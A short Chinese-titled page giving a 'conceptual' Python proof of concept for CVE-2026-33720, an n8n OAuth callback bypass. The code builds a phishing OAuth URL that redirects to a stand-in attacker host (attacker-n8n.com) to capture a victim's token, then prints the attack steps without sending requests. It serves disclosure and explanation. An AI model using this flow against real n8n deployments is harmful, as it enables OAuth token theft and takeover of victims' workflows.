CVE-2026-33720 n8n OAuth回调绕过漏洞

# Conceptual PoC for CVE-2026-33720 # This demonstrates the attack flow for OAuth callback bypass import requests # Step 1: Attacker creates a credential in their n8n instance # This credential will store the victim's OAuth token # Step 2: Attacker constructs malicious OAuth URL # The URL points to the OAuth provider but will redirect to attacker's n8n malicious_oauth_url = ( "https://oauth-provider.com/authorize?" "response_type=code&" "client_id=attacker_client_id&" "redirect_uri=https://attacker-n8n.com/oauth/callback&" "scope=read write&" "state=attacker_controlled_state" ) # Step 3: Send phishing link to victim # Victim clicks and authorizes the application # Step 4: After victim authorizes, the token is stored # in attacker's credential due to missing state verification # Step 5: Attacker uses the stolen token to execute workflows # or access victim's resources def exploit_oauth_bypass(target_oauth_provider): """ Demonstrates the OAuth callback bypass vulnerability. Requires N8N_SKIP_AUTH_ON_OAUTH_CALLBACK=true to be set. """ print(f"[+] Attacker initiates OAuth flow with {target_oauth_provider}") print(f"[+] Malicious URL: {malicious_oauth_url}") print(f"[+] Waiting for victim to complete authorization...") print(f"[+] Token captured in attacker's credential due to state bypass") print(f"[+] Attacker can now execute workflows as victim") if __name__ == "__main__": exploit_oauth_bypass("example-oauth-provider")